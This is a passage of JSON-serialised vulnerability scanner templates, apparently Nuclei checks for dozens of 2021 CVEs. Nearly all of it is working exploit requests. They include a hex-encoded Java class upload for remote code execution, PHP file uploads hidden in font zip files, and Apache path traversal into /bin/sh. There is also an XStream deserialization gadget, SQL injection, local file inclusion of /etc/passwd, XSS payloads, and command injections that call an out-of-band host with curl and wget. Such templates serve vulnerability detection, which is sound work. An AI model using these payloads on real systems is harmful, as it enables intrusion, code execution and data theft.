== 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-25094","info":{"name":"Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38\n\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"action\"\n\nadd_custom_font\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.zip\"\n\n{{zip('.{{filename}}.php','<?php echo base64_decode(\\'{{b64marker}}\\'); ?>')}}\n--a8bfdd88f26f754c25496d0dd4962d38--\n"],"matchers":[{"type":"word","part":"body","words":["\"name\":\"{{to_lower(filename)}}\"","\"status\":\"success"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/uploads/typehub/custom/{{to_lower(filename)}}/.{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{marker}}"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24915","info":{"name":"Contest Gallery < 13.1.0.6 - SQL injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WpUserId","Username","Usermail"],"condition":"and"},{"type":"word","part":"header","words":["text/csv","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Pie Register","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24627","info":{"name":"G Auto-Hyperlink <= 1.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+I\n","GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["c8c605999f3d8352d7bb792cf3fdb25b","Keyword","g-auto-hyperlink-edit"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-29006","info":{"name":"rConfig 3.9.6 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /dashboard.php HTTP/1.1\nHost: {{Hostname}}\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_2","words":["rconfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: 